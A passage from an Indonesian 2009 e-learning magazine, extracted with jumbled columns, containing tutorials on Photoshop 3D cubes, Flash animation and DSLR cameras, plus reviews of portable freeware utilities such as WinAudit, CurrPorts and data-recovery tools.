} Ya, penjelasan secara detilnya akan penulis jelaskan pada sesi yang
akan datang. Selamat Mencoba.
imagejpeg($img);
imagedestroy($img); [Al-k]

?>

27 .ilmuwebsite magazine | perdana 2009


.desain .ilmuwebsite
grafis .magazine e-learning community offline version

Tutorial:
28 Membuat 3D Cube
dengan Adobe Photoshop

Membuat 3D Cube
dengan Adobe Photoshop
.desaingrafis

Tentunya susah susah


gampang membuat objek 3D
di Photoshop, apalagi dengan
efek yang akan kita bahas kali
ini. Yakni cara membuat efek
transparent pada objek
3D Cube.

1 2
Siapkan canvas baru berukuran 800 x 800 px Ambil Rectangle Tool dan buat bidang
dengan Dpi 72px/inc. Sedangkan warna seperti pada gambar. Tekan [CTRL+T] untuk
mentransform objek, dan ubah angle nya
background menggunakan warna putih. menjadi 45 derajat. Lalu tekan [ENTER] 2 X.

28 .ilmuwebsite magazine | perdana 2009


.ilmuwebsite .desain
e-learning community offline version .magazine grafis

3 4
Lanjutkan dengan menekan [CTRL+T] lagi dan Free Transform- Lalu klik kanan pada bidang transform, pilih Distort. Geser ke
lah objek berwarna biru ke arah dalam arah kanan, agar bidang menjadi agak miring.
Lalu tekan [ENTER] dua kali.

5 6
Duplikat layer objek berwarna biru untuk dasar Cube, dan geser ke Kemudian ambil pen tool, tentukan setting pen nya seperti pada
bawah. Bagian penutup atas nantinya akan kita hapus / hidden gambar, lalu buatlah bidang persegi untuk penutup sebelah kiri,
layernya. mengikuti titik berwarna merah.

7 8
Pindahkan layer objek berwarna hijau ke bawah layer untuk Buatlah beberapa bidang lagi untuk menutupi bidang Cube yang
penutup atas. masih kosong.

.ilmuwebsite magazine | perdana 2009 29


.desain .ilmuwebsite
grafis .magazine e-learning community offline version

9 10
Disini saya membedakan warna bidang agar mudah dalam Kurangi opacity untuk layer hitam dan orange menjadi 50 % agar
mengenal posisinya. bidang di belakangnya terlihat / transparan.
Ubah nama masing - masing layer sesuai dengan warna bidang

Opacity 50% (orange)

Opacity 50% (hitam)

11 12
4
Selanjutnya kita akan gunakan layer style. Pilih menu Layer > Layer 5 objek pencil ke dalam Cube. Bukalah file gambar pensil, dan
Copy
Style > Gradient Overlay. Gunakan arah angle gradasi. Lakukan hal tekan [CTRL+A]. Lalu tekan [CTRL+C] , paste di objek Cube, tetapi
yang sama untuk layer layer yang lain, kecuali layer penutup atas. letakkan layer nya berada di bawah layer hitam dan orange
Hidden lah layer ini.

13 14
9 10
Disini Anda dapat memiringkan objek pensil dengan mentransform Wah, ternyata sampai sini objek Anda memperlihatkan sebuah Cube
nya ke arah angle beberapa derajat ke kiri. yang transparan, dan didalamnya tampak dua buah pensil.
Lakukan langkah yang sama untuk pensil kedua. Berikut adalah hasil akhir setelah di berikan sedikit modifikasi pada
Cubenya: [dr.emi]

30 .ilmuwebsite magazine | perdana 2009


.flash .ilmuwebsite
.magazine e-learning community offline version
animation
Intro :
Overview flash di dunia
31 maya

34
Tutorial :
Teknik dasar 2d animasi
dalam flash
Overview Flash
di Dunia Maya
flash and animation

Eksistensi Flash sebagai elemen yang mewarnai dunia maya merupakan


suatu hal yang lazim. Software keluaran Macromedia, yang sekarang
menjadi milik Adobe ini, ternyata bisa menjadi sebuah elemen yang
aplikatif maupun kreatif.

Flash Website

P
ada banner website misalnya, Flash
sering digunakan sebagai pemanis. Mungkin dahulu kita hanya mengetahui website
Dalam dunia bisnis, Flash pun bisa yang statis, yang malahan bisa dibuat dengan
membangun keindahan dari sebuah presentasi. menggunakan Notepad. Seiring berkembangnya
Aplikasi-aplikasi sederhana pun tak elaknya IPTEK, dimana setengah dari imbasnya
mulai terlahir dari Flash, contohnya kalkulator, mempengaruhi perkembangan dunia internet,
jam online, kalender, dan sebagainya. Dalam akhirnya lahirlah website yang menggunakan
dunia entertainment, penggunaan flash saat ini animasi sebagai elemen utamanya. Dinamakan
menjadi salah satu software yang bisa Flash Website, karena hampir 90% content yang
diandalkan. Mp3 streaming dan game flash ada dalam website tersebut menggunakan Flash.
merupakan aplikasi yang bisa dibilang anak Anda bisa mencoba menemui banyak Flash
kesayangan flash, karena penggunaannya begitu Website yang bertengger di dunia maya. Animasi
banyak bertebaran di dunia internet. dan beberapa efek yang digunakan,
Pada artikel ini, saya akan mengupas mengenai menghasilkan kesan sebuah website yang
eksistensi Flash itu sendiri di dunia internet, yang interaktif, manis, dan bahkan dinamis.
sering kita sebut dunia maya. Dikarenakan Flash dibaca secara streaming

31 .ilmuwebsite magazine | perdana 2009


.ilmuwebsite .flash
e-learning community offline version .magazine animation

pada browser-browser yang mendukungnya, akhirnya tren


penggunaan Preloader pun muncul.

Preloader.
Preloader adalah sebuah elemen pra-halaman utama, dimana berisi
informasi mengenai website yang sedang dimuat oleh browser.
Preloader bisa berupa animasi. Biasanya preloader menggunakan
animasi karena pada penggunaannya, bisa menahan si pengunjung
website untuk tidak berpindah ke halaman website lain. Selain
memberikan kesan manis, namun juga bisa memberikan
rasa penasaran pada pengunjung mengenai website yang sedang
dimuat tersebut. Beberapa contoh Flash Website yang menarik.

memuat mp3, flash tentunya bisa menghasilkan desain interface yang


unik sesuai dengan selera pembuatnya. Dalam Flash Website pun
penggunaan mp3 merupakan elemen pemanis yang bisa
mempercantik kesan yang ingin didapat.

Flash dan Entertainment


Hiburan semacam mp3 streaming dan game tentunya menjadi salah
satu menu utama pengunjung dunia maya. Begitu banyak penyedia
layanan mp3 streaming di internet. Sebagai sebuah enterainment,
musik memang tak lepas dari kehidupan kita. Apalagi dengan semakin
berkembangnya teknologi, tidak tertutup kemungkinan nantinya kita
Contoh situs Preloader bisa langsung mendengarkan demo musik terbaru di internet yang

Banner langsung di-upload dari penyanyi kesukaan kita. Kesan 'mengikuti


Banner yang saat ini kebanyakan menggunakan animasi Flash, bisa perkembangan tren musik setiap detik' pun sudah bukan isapan jempol
dibilang hal yang penting untuk menunjang seni pembuatan website. lagi jika hal tersebut memang terjadi.
Dibandingkan dengan banner yang statis, tentunya penggunaan Flash Flash game merupakan salah satu entertainment yang bisa kita nikmati
Banner mempunyai nilai plus. Menghindari hal yang membuat langsung lewat internet. Dahulu kita hanya bisa memainkan game di
pengunjung cepat bosan, kemungkinan menjadi alasan mengapa komputer kita sendiri, tanpa terhubung dengan internet, namun
sekarang ini Flash Banner menjadi salah satu elemen utama pemanis sekarang kita bisa langsung meamainkan sebuah game di internet.
website Keunikan memainkan game flash terletak pada highscore system,

dimana kita bersaing dengan semua orang di belahan dunia yang


sama-sama memainkan flash game. Tentunya ini menjadi hal yang

Contoh situs penyedia banner dinamis

Mp3 streaming
Flash juga mendukung penggunaan mp3. Itulah mengapa sekarang
banyak mp3 streaming di internet yang menggunakan flash. Selain bisa Contoh situs game online

.ilmuwebsite magazine | perdana 2009 32


.flash .ilmuwebsite
.magazine e-learning community offline version
animation

merangsang kita untuk memainkan sebuah game online, termasuk seseorang. Namun, setidaknya dengan adanya flash, orang yang tidak
Flash game salah satunya. bisa menggambar pun bisa membuat sebuah animasi sederhana.
Bisnis di dunia internet memang sedang marak. Flash game sebagai
entertainment di dunia maya, tak terlepas juga dengan bisnis. Saat ini
semakin marak bisnis Flash game di internet. Developer-developer
flash game pun setiap harinya bersaing demi mendapatkan sponsor
dari situs yang menyediakan berbagai flash game online. Nilai minimal
100$ pun bisa diraih sesuai dengan keunikan game tersebut. Bahkan,
ada beberapa situs flash game online yang menyediakan sampai
3000$ hanya untuk mensponsori sebuah flash game. Menarik kan?

Film 2d animasi
Satu lagi, salah satu entertainment yang tidak bisa dilewatkan, adalah
Film 2d animasi. Flash dengan kemampuannya membuat animasi,
Contoh film 2d animasi yang menggunakan flash
menjadikannya software yang dicari para animator. Sistem frame per
frame animation ataupun tweening bisa kita aplikasikan melalui Flash. Dari pengulasan mengenai Flash diatas, setidaknya kita tahu mengenai
Dengan adanya teknologi komputer di jaman sekarang ini, amatlah perkembangan dunia maya. Penggunaan flash yang semakin marak
jelas pengaruhnya dalam hal mempermudah pembuatan animasi. memberikan gambaran betapa cepatnya teknologi di dunia internet
Jika kita bandingkan dengan sistem pembuatan animasi secara berkembang. Untuk itu, tidak ada salahnya jika kita ingin mempelajari
tradisional, mungkin akan memakan waktu yang lama untuk Flash. Bukan suatu hal yang sulit sebenarnya, dengan penguasaan kita
menghasilkan sebuah animasi yang terdiri dari ratusan frame. menggunakan Flash, kita bisa meraup dollar di dunia internet.
Memang, pembuatan animasi tergantung dari seberapa kreatifnya [tovan_putra_angin ]

It’s
Show
Time !!

33 .ilmuwebsite magazine | perdana 2009


.ilmuwebsite .flash
e-learning community offline version .magazine animation

Teknik Dasar
2d Animasi dalam Flash
(Bagian 1)

F lash pada dasarnya adalah sebuah program untuk 2D animasi. Dalam tutorial ini, Anda bisa
mempelajari beberapa teknik dasar untuk membuat animasi yang menarik. Teknik yang akan
saya jelaskan dibawah ini adalah bagaimana membuat sebuah animasi tulisan yang sebelumnya
kosong, seolah-olah tulisan tersebut ditulis oleh tangan.

1
Buatlah sebuah file baru dalam flash. Klik file -> New.

Pada settingan awal, kita cukup menggunakan screen bekuruan


550x400 (default dalam flash). Jadi, kita tidak perlu mengubah
ukuran screen. Biarkanlah FPS(ditandai lingkaran biru pada
gambar1) tetap pada 12 fps. Sebenarnya jika animasi kita ingin
terlihat smooth, kita bisa menggunakan fps yang lebih besar.
Misalnya, untuk animasi cartoon anime saja bisa menggunakan
minimal 32 fps. Untuk film, lebih dari 60 fps.
Setelah itu, dengan menggunakan tool pencil atau brush (ditandai
lingkaran merah pada gambar1), buatlah sebuah tulisan sederhana
pada workspace. Mungkin Anda ingin menulis nama sendiri? Gambar 1
silahkan :)

2 3
Sekarang kita sudah mempunyai sebuah tulisan yang akan kita Dengan menggunakan tool Eraser (lihat gambar3), hapuslah bagian
animasikan. Pada tab timeline, klik pada frame 2, lalu klik kanan dan atau ujung dari huruf terakhir. Hasilnya akan seperti gambar4.
pilih insert keyframe seperti yang Anda bisa lihat pada gambar2.

Gambar 2 Gambar 3

.ilmuwebsite magazine | perdana 2009 34


.flash .ilmuwebsite
.magazine e-learning community offline version
animation

4 5
Lakukan hal yang sama untuk setiap huruf. Caranya, setelah kita Semakin kita menghapus sedikit demi sedikit dari bagian huruf yang
menghapus sedikit bagian dari setiap huruf tersebut, klik kolom frame ada di gambar, kita bisa mendapatkan hasil animasi yang berjalan
berikutnya, lalu insert keyframe seperti yang kita lakukan pada dengan halus atau smooth. Pada beberapa gambar dibawah ini, bisa
langkah-langkah awal diatas. Anda lihat proses tiap beberapa frame sampai huruf terhapus.

Gambar 4
Gambar 5

6 7
Akhirnya kita akan mendapati workspace yang kosong kembali
karena terhapusnya semua huruf-huruf tadi.

Gambar 6

Gambar 7 Gambar 8

8 9
Setelah kita melakukan tahap-tahap diatas, klik frame pertama, lalu Fungsi reverse frames adalah menukar posisi dari frame-frame yang
tekan tombol shift, dan klik frame terakhir di tab timeline. Klik kanan kita blok. Tentunya ini sangat memberikan kemudahan bagi kita
dan pilih reverse frames. untuk membuat animasi sederhana. Untuk melihat hasilnya, tekan
ctrl + Enter. Anda akan melihat animasi sebuah tulisan yang tertulis
dengan sendirinya. Dengan daya imajinasi kita, kita bisa sekreatif
mungkin menerapkan teknik ini untuk animasi yang lebih unik.
Misalnya, untuk animasi sebuah film horror, jika kita ingin membuat
sebuah tulisan berdarah di cermin yang muncul tiba-tiba, teknik ini
bisa diterapkan. Masih banyak animasi unik yang bisa kita buat
dengan menggunakan teknik sederhana ini. Kekreatifan dan daya
imajinasi kita menentukan hasilnya. Selamat mencoba ;)
Gambar 9 [tovan_putra_angin ]kita menentukan hasilnya. Selamat mencoba ;)
[tovan_putra_angin ]

35 .ilmuwebsite magazine | perdana 2009


.fotografi .ilmuwebsite
.magazine e-learning community offline version

Tutorial :
36 Mengakrabkan diri
dengan kamera DSLR
.fotografi

Mengakrabkan diri
dengan
Kamera DSLR
Teknologi digital, merupakan teknologi terbuka selama waktu yang ditentukan.
modern yang memudahkan sekaligus DSLR merupakan hasil digitalisasi produk SLR.
memanjakan manusia saat ini. Begitupun Proses Digitalisasi ini menghasilkan kamera
dengan digitalisasi fotografi, kebanyakan dengan fitur yang semakin melengkapi kamera
orang mengatakan bahwa digitalisasi SLR, sehingga membuat fotografer semakin
fotografi memudahkan seorang fotografer percaya diri dengan hasil yang didapat dari
mendapatkan gambar bagus dengan cepat bidikannya.

Namun ternyata, gambar yang bagus tidak Mengapa DSLR ini dikatakan melengkapi kamera
serta merta mudah didapatkan hanya karena SLR? Sebelumnya kamera SLR menggunakan Film
digitalisasi fotografi semata. Penguasaan sebagai media penyimpanan. Kekurangan dari film
DSLR yang konon katanya merupakan sebagai media penyimpanan adalah sifatnya yang
digitalisasi SLR tetap menjadi syarat mutlak sekali pakai, mudah usang dan tidak memiliki
untuk memperoleh hasil maksimal. Untuk itu pilihan asa, artinya satu jenis film hanya memiliki
pada pembahasan rubrik teknik fotografi kali satu jenis asa. Sedangkan DSLR menggunakan
ini penulis akan mencoba mengakrabkan digital memory sebagai media penyimpanan.
anda dengan teknologi fotografi modern saat
ini, yakni DSLR. Kelebihannya dapat digunakan terus menerus dan
tidak mempengaruhi ISO, karena kamera DSLR
Teori Umum DSLR biasanya menyediakan beberapa pilihan ISO tanpa
DSLR merupakan singkatan dari Digital Single terpengaruh media penyimpanan tersebut.Selain
Lens Reflex yang berarti Refleksi Lensa itu, hasil foto yang tertangkap dapat langsung dilihat
Tunggal Digital. Artinya gambar yang dengan memanfaatkan fasilitas LCD (Liquid Crystal
ditangkap oleh lensa kemudian direfleksikan Display). LCD pada DSLR merupakan viewer untuk
menuju cermin dengan kemiringan 45 derajat gambar yang telah ditangkap, LCD pada DSLR
lalu diteruskan ke pentaprisma hingga sampai bukan berfungsi sebagai pembidik atau view finder.
ke view finder, ketika shutter release ditekan Dengan LCD ini fotografer dapat menentukan
maka saat itu juga cermin berubah apakah gambarnya sudah sempurna atau perlu
kemiringannya menjadi 90 derajat, begitu juga pengambilan gambar lagi, tanpa harus melakukan
dengan rana (sejenis tirai) penutup sensor cuci film dan cetak.

36 .ilmuwebsite magazine | perdana 2009


.ilmuwebsite .fotografi
e-learning community offline version .magazine

Teori Lanjut DSLR yaitu kamera generasi sebelumnya. digital. Berikut pembahasan secara
Ditentukan oleh settingan Shutter Speed mendalam.
(kecepatan membuka dan menutup rana),
Diagfragma (Pembukaan Doff pada lensa) Analog
dan ISO (sensitifitas sensor terhadap cahaya) Pada lensa analog, pengaturan diafragma
yang pada SLR dinamakan Assa (sensitifitas berada pada lensa itu sendiri. Tentu saja
film terhadap cahaya). Namun kemudian Karena generasinya berbeda lensa analog ini
DSLR melengkapinya dengan settingan
kualitas gambar yang biasa ditentukan
3
dengan efektifitas Pixel. 2 1
Baik, selanjutnya akan dibahas satu persatu
4
fungsi fungsi Tools DSLR tersebut.

Gambar 1 : struktur kamera DSLR Shutter Speed


Shutter Speed, merupakan pengaturan
Cermati gambar diatas : kecepatan membuka dan menutup rana /
1. Elemen Lensa
2. Lensa Reflex
Ket :
3. Rana 1.Pengatur Fokus
4. Sensor 2.Pengatur Zoom
5. Layar fokus 3.Ukuran Milimeter/jarak pandang ke Objek
6. Lensa Alat penerima / Condenser lens 4.Diafragma
7. Pentaprisma Gambar 2 : pengaturan shutter speed Gambar 4 : lensa anallog
8. Eyepiece / view finder
sejenis tirai yang melindungi sensor terkadang ada yang suitable dengan body
penangkap gambra dari cahaya. Karena
Berikut cara kerja Kamera DSLR. DSLR ada juga yang tidak. Seperti yang di
sensor penangkap gambar ini sangat peka perlihatkan oleh gambar lensa analog
Prinsip dasarnya DSLR menggunakan cermin
sekali terhadap cahaya maka hitungan sekaligus topology-nya diatas.
untuk memperlihatkan image / gambar yang
shutter speed ini biasanya satu per sekian
akan ditangkap oleh view finder. Pertama
detik. Digital
tama lensa mengumpulkan cahaya yang
dihasilkan sebuah objek (1) selanjutnya
meneruskan cahaya tersebut ke cermin (2)
kemudian cermin tersebut merefleksikannya
menuju ke layar fokus (5) dari situ dilanjutkan
menuju alat penerima (6) selanjutnya
diteruskan ke pentaprisma (7) hingga cahaya
Gambar 3 : shutter speed Gambar 5 : lensa digital
tersebut tergambar menjadi sebuah objek
yang dapat terlihat di viewfinder / Eyepiece
(8). Coba anda perhatikan pengaturan shutter Pada lensa digital, pengaturan dapat
speed di dilakukan secara automatic ataupun manual.
Disaat yang besebrangan namun juga dapat DSLR, anda akan menemukan angka angka
seperti berikut misal :1/1000, 1/500, 1/250, Ketika setting berada pada posisi automatic,
bertepatan. Ketika Shutter release ditekan,
maka cerminpun bergerak hingga 90 derajat 1/125, 1/60.....hingga Bulb. Arti dari angka berarti diafragma akan diatur secara otomatis
dan membuka jalan sehingga cahaya objek 1/1000 itu adalah satu per 1000 detik. Jadi mengikuti sensor cahaya. Ketika pengaturan
tersebut bergerak menuju rana (3) hingga bisa anda bayangkan betapa cepatnya rana berada pada posisi manual, maka diafragma
akhirnya ditangkap sensor (4) dan menutup dan membuka.
Dapat diatur sesuai kebutuhan. Dan
menyimpannya di dalam media
penyimpanan. Diagfragma / Apeture pengaturannya tidak lagi berada di lensa dan
Diafragma merupakan lebar pembukaan doff dilakukan secara manual. Namun
Fungsi Fungsi Tools DSLR pada lensa. Jika dilihat dari jenis lensa ada pengaturannya dilakukan di Body kamera
Pada dasarnya kinerja DSLR seperti SLR, dua jenis pengaturan diafragma, analog dan secara digital.

.ilmuwebsite magazine | perdana 2009 37


.fotografi .ilmuwebsite
.magazine e-learning community offline version

ISO tergantung dengan media penyimpanan ditentukan oleh moment.


ISO, sebelumnya dikenal dengan Assa dalam semisal Film atau memory card. Ada kamera Menguasai Shutter Speed,
Teknologi SLR. Kedua duanya merupakan DSLR yang menawarkan pengaturan ISO Diafragma dan pengetahuan akan pemilihan
Pengatur besar kecilnya cahaya yang dapat mulai dari 200 hingga 1600, bahkan kamera ISO yang tepat merupakan langkah awal
diterima. Sebelumnya assa terbuat dari yang Proprofesional menawarkan ISO 50 untuk mahir dalam menggunakan DSLR.
hingga 1800. Hal ini menjadi nilai plus yang Konsep dan momen merupakan hal yang
semakin memudahkan para fotografer dalam mutlak untuk mendapatkan gambar terbaik.
melakukan pemotretan. Tidak perlu Fotografi, apapun alirannya, merupakan seni
membawa beberapa film dengan assa yang yang memadukan teknologi dan rasa.
berbeda. Karena pada kenyataan, memang Selamat menjadi fotografi sejati. [abuzahra ]
moment tidak bisa ditentukan assa, tetapi ISO
Gambar 5 : ISO

Beberapa cairan kimia yang sangat peka


terhadap cahaya, semakin besar nilai assa
maka semakin peka juga ia terhadap cahaya.
Artinya Assa 400 akan lebih peka menangkap
cahaya dibandingkan dengan assa 200, maka
itu terkadang orang yang menggunakan
kamera poket memilih assa 200 untuk
pemotretan diluar ruangan dengan asumsi
nilai cahaya yang tinggi, dan 400 untuk
pemotretan didalam ruangan dengan asumsi
nilai cahaya yang rendah.

Demikian halnya dengan ISO, ISO sama-


sama penentu besar kecil masuknya cahaya.
Hanya ada beberapa kelebihan dari ISO
dibanding Assa. Jika Assa yang terdapat pada
film itu tidak dapat diatur, artinya film dengan
assa 200 tidak mungkin dapat diatur menjadi
assa 400. Berbeda halnya dengan ISO,
pengaturan ISO yang terdapat pada DSLR
lebih beragam. Dan ISO sama sekali tidak

Pastikan!!
Sistem
Operasi
Anda
LINUX
38 .ilmuwebsite magazine | perdana 2009
.ilmuwebsite
.ilmuwebsite
.software
.magazine.magazine e-learning community offline version

Koleksi Software
Portable dari Berbagai
39 Kategori

System utilities
49 Software pilihan kami
Productivity
Browser

Restoration Chat
Reader/Editor
Office Entertainment Media Tools
.software

Koleksi
Software Portable
dari Berbagai Kategori
Software portable sebagai salah satu pilihan agar kinerja pc menjadi
lebih ringan dan cepat.

Media portable seperti flashdisk, mp3 player, mp4 terasa lebih berat dalam penggunaannya, belum
player, ipod, dan berikut barisan media portable lengkap pluginnya, dan beberapa permasalahan
lain yang telah telah support device plug and play lain sering ditemui. Kita ambil contoh saja, jika si A
jelas-jelas semakin dibutuhkan oleh membutuhkan aplikasi word processor yang baik,
banyak kalangan dalam periode belakangan ini. tapi pc yang ditungganginya telah terinstall word
Kapasitas dari media portable kini bertahap processor yang dirasakan lebih berat, dan
membengkak sesuai dengan kebutuhan para cenderung lebih rumit dalam mengoperasikannya.
penggunanya, namun berbanding terbalik dengan Nah, disinilah fungsi dari aplikasi portable benar-
harga yang kini cenderung semakin menyusut. benar sangat dibutuhkan kehadirannya. Ya, saya
Kapasitas yang besar seperti ini sangat akan coba paparkan aplikasi-aplikasi portable dari
disayangkan jika tidak dimanfaatkan dengan berbagai kategori, yang dirasa cukup memenuhi
maksimal. Terlebih lagi jika pengguna media kebutuhan keseharian di berbagai bidang dan
portable seperti ini membutuhkan aplikasi viewer, kalangan. Mulai dari kategori system utilities,
player, ataupun editor file yang tentunya viewer recovery data, security, multimedia, graphic
atau editor file tersebut tidak ditemui dalam pc design, office, hingga aplikasi entertainment yang
yang hendak digunakan. Dan jika ada pun, viewer dapat digunakan untuk sekedar menghibur diri.
atau editor tersebut belum tentu sesuai dengan Ya, akhir kata saya ucapkan selamat
yang diinginkan oleh penggunanya. Berbagai bereksplorasi dengan aplikasi portable yang ada.
kendala seperti aplikasi yang terinstall dalam PC

39 .ilmuwebsite magazine | perdana 2009


.ilmuwebsite software.
e-learning community offline version .magazine

.System utilities
WinAudit StartupList

StartupList :: Tampilkan startup list

Anda yang sering melakukan Tuning untuk komputer anda,


mungkin sering mengecek daftar startup yang aktif di tools milik
windows yang bernama msconfig.

Namun kita tidak membahas tentang tool tersebut. Selain msconfig,


WinAudit :: Audit untuk Komputer Berbasis Windows ada juga tools sejenis yang berguna, yaitu StartUp List.

Sesuai namanya. WinAudit digunakan untuk meng-audit berbagai Tool sederhana ini akan merangkum berbagai program yang di load
perangkat yang terinstall didalam sistem komputer anda. saat komputer mulai diaktifkan. Tools jenis ini umum digunakan
Secara singkat, WinAudit akan mencari detil data tentang software untuk mengetahui mencari data tentang kemungkinan adanya virus,
yang terinstal, keamanan konfigurasi, data-data hardware dan lain trojan, dan malware lainnya.
sebagainya.
Saat diklik ganda, program dengan cepat akan merangkum daftar
Menggunakannya sangat mudah, pada saat anda mengklik ganda file Startup yang aktif dan menampilkannya dengan format teks.
WinAudit.exe yang kami sertakan, program akan langsung aktif tanpa
harus di Install, Klik ganda file StartupList.exe lalu akan keluar kotak dialog
lalu klik Here dibawah kalimat To audit your computer click. StartupList yang kira kira berbunyi This will create a list of all startup
entries,... kliklah Yes, maka akan keluar daftar list startup komputer
Tips anda.
Hasil Audit dari sistem komputer anda bisa anda simpan lewat 3 opsi.
1. Dikirimkan lewat e-Mail
2. Disimpan ke format HTML
3. Data base Export.

Sebagai contoh, cobalah untuk menyimpannya ke format HTML. Klik


Save, tentukan nama file,
lalu pada save as type: Pilih Web Page (HTML only)(*.htm,*.html).

Disamping itu, anda pun bisa menggunakan berbagai bahasa


termasuk Indonesia sebagai setting bahasa program tersebut.
Klik menu Language dan pilih bahasa yang anda inginkan.

License : Freeware License : Freeware


OS : Win95 / Win98 / WinME / WinNT / Win2k / WinXP / Vista OS : Win95 / Win98 / WinME / WinNT / Win2k / WinXP / Vista
Sistem Requirement : Prosesor pentium, Windows 95 atau diatasnya. Sistem Requirement : Prosesor pentium, Windows 95 atau diatasnya.

.ilmuwebsite magazine | perdana 2009 40


.software .ilmuwebsite
.magazine e-learning community offline version

.System utilities
AIDA32 Currports

Aida32 :: Analisa pc Currports :: Menampilkan list semua port tcp/ip dan udp

Aida32 akan menganalisa pc anda secara detail dan memberikan Currports menampilkan list semua port tcp/ip dan udp di komputer
informasi lengkap mengenai hardware dan software komputer anda. Anda. Untuk tiap tiap port di list iformasi tentang proses port yang
Software analisa ini menyediakan sebuah plug in AIDA32 CPUID akan terbuka juga di tampilkan, termasuk process name, seluruh bagian
memberikan informasi yang lengkap mengenai prosesor yang proses, informasi versi dari proses (nama produk, deskripsi file, dan
digunakan sejenisnya), waktu proses dibuat dan user yang dibuat.
Sebagai tambahan, currports memperboleh kan Anda untuk menutup
Tips: koneksi TCP yang tidak dibutuhkan, menghentikan proses ports yang
Anda dapat membuat report yang lengkap tentang masalah komputer terbuka, dan menyimpan informasi port TCP/UDP ke dalam format
anda melalui report wizard yang sangat berguna. HTML dan XML.

License : Freeware License : Freeware


OS : Windows XP, 2000, 98, Me, NT OS : Win95 / Win98 / WinME / WinNT / Win2k / WinXP / Vista
Sistem Requirement : Tidak ada persyaratan khusus. Sistem Requirement : Prosesor pentium, Windows 95 atau diatasnya.

Pstart
program-program portable koleksi anda.
Memudahkan anda untuk mencari program
dan menggunakannya.

Jalankanlah PStart, klik ganda setup filenya


(PStartSetup.exe) lalu program pun akan aktif
dan terlihat. Klik kanan lalu pilih Add file.

Tips
Bila koleksi program portable anda berada
dalam satu folder atau beberapa folder, maka
License : Freeware
Pstart :: Tombol start tambahan windows biarkan PStart mencarinya dan
mendaftarkannya ke menu untuk anda. OS : Win 95, Win98, WinXP, Vista
PStart adalah program kecil yang sederhana. Sistem Requirement : None
Sangat berguna untuk mendaftarkan Caranya, klik file lalu klik scan for executable.

41 .ilmuwebsite magazine | perdana 2009


.ilmuwebsite software.
e-learning community offline version .magazine

.Restoration
Smart Data Recovery Power Data Recovery Pro v4.1.1 Portable

Smart Data Recovery :: Pilihan lain recovery data Power Data Recovery :: Aplikasi Recovery Data Handal

Satu lagi pilihan tool untuk reovery anda. Dengan tampilan yang Bagi anda yang sibuk dengan pekerjaan anda, apalagi anda yang
berbeda, tool ini terlihat sederhana dan mudah dioperasikan. Dilihat seorang "Flashdisk Minded" tentunya sering menkopi atau
dari tampilan awalnya pun akan terkesan mudah. menghapus data-data ke maupun dari flashdisk. Adakalanya anda
dituntut untuk bekerja lebih cepat, sampai-sampai pada saat
Selain Flashdisk, storage media yang bisa di recover antara lain, penghapusan data yang tidak perlu, file yang tidak seharusnya
Harddisk, Kamera digital, USB Drives, Memory stick, PC Card, dihapuspun tanpa sengaja ikut terhapus. Lebih buruk lagi anda
Multimedia Card, Secure digital card dan Disket. menghapusnya dengan kombinasi tombol shift+del. Alhasil program
andapun secara permanen akan terhapus. Namun tak usah khawatir,
banyak tool-tool recovery yang berguna untuk mengembalikan file-file
yang terhapus tadi. Salah satunya adalah Power Data Recovery.

Kami telah menyertakan program tersebut pada CD bawaan majalah


ini. Bila anda mengaktifkannya, maka anda akan dibawa langsung ke
menu utama tools tersebut. Didalam Home, terdapat 4 pilihan menu,
dari yang basic sampai pada level yang lebih tinggi. Yaitu Undelete
Recovery, Advance Recovery, Deep Scan Recovery, Resume
Recovery.
Pemakaian didesain
memudahkan untuk pengguna
awal sampai pun mahir. Anda
akan mudah memakainya
untuk proses recovery karena
tampilannya yang menarik.

License : Freeware License : Freeware


OS : Win95 / Win98 / WinME / WinNT / Win2k / WinXP / Vista OS : Win95 / Win98 / WinME / WinNT / Win2k / WinXP / Vista
Sistem Requirement : FAT 12/16/32 and NTFS file system Sistem Requirement : Prosesor pentium, Windows 95 atau diatasnya.

.ilmuwebsite magazine | perdana 2009 42


.software .ilmuwebsite
.magazine e-learning community offline version

.System utilities
UK Kalender Anim8or

UK Kalender :: Schedulling task program Anda tentunya pernah mendengar tentang program 3D maker seperti
3D Max Studio atau Maya. Namun program-program tersebut
Mungkin terlintas dalam pikiran anda saat membaca software ini. menuntut spek komputer yang lumayan besar. Namun untuk anda
Kalender orang Inggris. Kenyataannya tidak sepenuhnya seperti itu. yang ingin memulai dasar-dasar 3D Modelling, tak ada salahnya
Software sejenis schedule task ini merupakan salah satu pilihan mencoba program yang satu ini. Anim8or adalah program 3D
software yang bisa anda gunakan untuk membuat jadwal kegiatan Modelling sederhana yang bisa anda gunakan untuk belajar dasar 3D.
anda. Beberapa fitur yang ditawarkan tools ini adalah: Dengan spek komputer yang tidak terlalu besar, program ini
1. Simpan otomatis. Setiap perubahan di database otomatis akan membantu anda membuat model-model 3D dengan mudah. Program
di save. ke dalam disk. ini memang menawarkan tool-tool yang diperlukan untuk mempelajari
2.Unlimited Undo dan Redo dasar 3D modeling. Inilah yang membuatnya berbeda dari program
3.Dapat diminimize ke dalam sistem tray sejenis lainnya. Mudah digunakan dan tidak mencakup banyak fitur
4.Mendukung Shared Event Kalender, dimana pengguna dapat pilihan. Selain itu Anim8or juga mendukung format file 3D lainnya,
memasukan kegiatan dan dapat dilahat oleh user lainnya seperti 3D Studio Max (.3ds), Lightwave (.lwo), Wavefront (.obj),
5.Mengulang event yang ada. Anim8or (.an8).

License : Freeware License : Freeware


OS : Windows XP, 2000, 98, Me, NT OS : Win95 / Win98 / WinME / WinNT / Win2k / WinXP / Vista
Sistem Requirement : None Sistem Requirement : None

Pastikan
sistem
Operasi
Anda
LINUX

43 .ilmuwebsite magazine | perdana 2009


.ilmuwebsite software.
e-learning community offline version .magazine

.Readers/editors
Foxit PDF Reader TexNotesPRO

Foxit PDF Reader :: Fast PDF Reader TexNotesPRO :: Buku digital Anda

Bagi anda yang pekerja kantoran tentunya sering menggunakan file Di era digital saat ini, tentunya komputer sudah menjadi barang yang
berformat PDF. Dan program yang populer untuk membukanya sangat diperlukan. Kini catatan penting anda pun dituntut untuk dibuat
adalah Adobe Acrobat Reader. secara digital sebagai ganti pena dan tinta. Tentunya kita mengenal
Namun bagi sebagian pengguna komputer low end, penggunaan program-program office seperti Open Office atau MS Word. Program-
program tersebut dirasa agak berat saat mencoba membuka file PDF. program tersebut khusus digunakan untuk office.
Dengan Foxit Reader, proses pembukaan file PDF akan terasa ringan Namun ada program khusus untuk mengelola catatan-catatan anda.
pada komputer low end.Selain cepat, tampilan Foxit pun didisain Dengan berbagai fitur tambahan yang memudahkan anda.
